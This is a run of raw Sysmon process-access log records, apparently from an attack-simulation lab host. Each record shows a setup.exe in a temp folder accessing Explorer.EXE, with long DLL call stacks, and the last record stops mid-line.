13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow6